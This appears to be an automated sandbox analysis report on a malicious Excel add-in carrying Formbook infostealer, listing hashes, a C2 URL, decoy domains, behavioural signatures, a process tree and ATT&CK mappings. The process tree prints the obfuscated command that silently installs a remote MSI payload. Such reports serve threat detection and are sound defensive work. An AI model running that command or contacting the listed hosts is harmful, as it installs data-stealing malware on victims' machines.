Analysis

  • max time kernel
    147s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    06-05-2021 14:25

General

  • Target

    14.xlam

  • Size

    15KB

  • MD5

    11e9376ee19889ee5c08e816b1d3b231

  • SHA1

    d22b56bedc58de7da73d647a5f3048b9cabc17d7

  • SHA256

    cfee90218720f31491495dd353027017808fb3b9524d6c86ddfd016a372f627c

  • SHA512

    fe846e63b1616166bebed98bdea82f1d141a23a0abc68cf6dc94216f9b0242859dcebd5471aa0943a46a5ecfca1e430badaf049db4469ec3a13a252b2eb8164b

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.111bjs.com/ccr/

Decoy

abdullahlodhi.com

jevya.com

knoxvillerestaurant.com

mekarauroko7389.com

cricketspowder.net

johannchirinos.com

orangeorganical.com

libero-tt.com

lorenaegianluca.com

wintab.net

modernmillievintage.com

zgdqcyw.com

jeffabildgaardmd.com

nurulfikrimakassar.com

findyourchef.com

innovationsservicegroup.com

destek-taleplerimiz.com

whfqqco.icu

kosmetikmadeingermany.com

dieteticos.net

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 6 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1256
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\14.xlam
      2⤵
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/4409212.msi /qn
        3⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1904
        • C:\Windows\SysWOW64\msiexec.exe
          mSiExec /i http://farm-finn.com/admin/4409212.msi /qn
          4⤵
          • Use of msiexec (install) with remote resource
          • Suspicious use of AdjustPrivilegeToken
          PID:1756
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\SysWOW64\netsh.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:856
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\Installer\MSI95BD.tmp"
        3⤵
          PID:1612
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Blocklisted process makes network request
      • Enumerates connected drives
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1344
      • C:\Windows\Installer\MSI95BD.tmp
        "C:\Windows\Installer\MSI95BD.tmp"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:952
        • C:\Windows\Installer\MSI95BD.tmp
          "C:\Windows\Installer\MSI95BD.tmp"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:2040

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    2
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    3
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\Installer\MSI95BD.tmp
      MD5

      d8a19f13154e81e9d526077422655453

      SHA1

      573e6aed1534203b36f9a8e5121c125b02e11b0f

      SHA256

      b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853

      SHA512

      193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae

    • C:\Windows\Installer\MSI95BD.tmp
      MD5

      d8a19f13154e81e9d526077422655453

      SHA1

      573e6aed1534203b36f9a8e5121c125b02e11b0f

      SHA256

      b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853

      SHA512

      193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae

    • C:\Windows\Installer\MSI95BD.tmp
      MD5

      d8a19f13154e81e9d526077422655453

      SHA1

      573e6aed1534203b36f9a8e5121c125b02e11b0f

      SHA256

      b525832c63ea5d05a8afde822fcb39e5fb759497e7c2c986a5673fec721ed853

      SHA512

      193344e672c7fb66fbd6acc2608c1d9acf360091ddf8086e5609e5a8ed511e1117fc2b7eb7cb43b56e984bf9f98f6a7648f8f1b0defc1416b2dca3c557ae39ae

    • \Users\Admin\AppData\Local\Temp\nss96A5.tmp\3dd73lht.dll
      MD5

      df8beafa8d4250032a73e261c80e35e3

      SHA1

      3ced0abd9f02d24d79ede5052f661108b01df997

      SHA256

      a57717b0b91bb128761a4363d12cacd45431c7e512d5a8d307b40cf30e6a26da

      SHA512

      bf9fd7009e3c4919b2b230748c8f3795423b4e7e57d82d531a31682916dfb589c2df2b20320a51b532e21dec98ce597a4a80589ec5fa442417274661e1c9d1ce

    • memory/856-81-0x0000000000EE0000-0x0000000000EFB000-memory.dmp
      Filesize

      108KB

    • memory/856-83-0x0000000000B20000-0x0000000000E23000-memory.dmp
      Filesize

      3.0MB

    • memory/856-84-0x0000000000A30000-0x0000000000AC3000-memory.dmp
      Filesize

      588KB

    • memory/856-82-0x0000000000080000-0x00000000000AE000-memory.dmp
      Filesize

      184KB

    • memory/856-79-0x0000000000000000-mapping.dmp
    • memory/952-67-0x0000000000000000-mapping.dmp
    • memory/952-72-0x00000000003F0000-0x00000000003F2000-memory.dmp
      Filesize

      8KB

    • memory/1096-60-0x000000002F951000-0x000000002F954000-memory.dmp
      Filesize

      12KB

    • memory/1096-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1096-61-0x00000000714F1000-0x00000000714F3000-memory.dmp
      Filesize

      8KB

    • memory/1256-85-0x00000000070F0000-0x000000000720E000-memory.dmp
      Filesize

      1.1MB

    • memory/1256-78-0x0000000006CF0000-0x0000000006E2D000-memory.dmp
      Filesize

      1.2MB

    • memory/1344-66-0x000007FEFBC41000-0x000007FEFBC43000-memory.dmp
      Filesize

      8KB

    • memory/1612-80-0x0000000000000000-mapping.dmp
    • memory/1756-65-0x0000000075201000-0x0000000075203000-memory.dmp
      Filesize

      8KB

    • memory/1756-64-0x0000000000000000-mapping.dmp
    • memory/1904-63-0x0000000000000000-mapping.dmp
    • memory/2040-77-0x0000000000260000-0x0000000000274000-memory.dmp
      Filesize

      80KB

    • memory/2040-75-0x0000000000400000-0x000000000042E000-memory.dmp
      Filesize

      184KB

    • memory/2040-76-0x00000000008C0000-0x0000000000BC3000-memory.dmp
      Filesize

      3.0MB

    • memory/2040-73-0x000000000041EBB0-mapping.dmp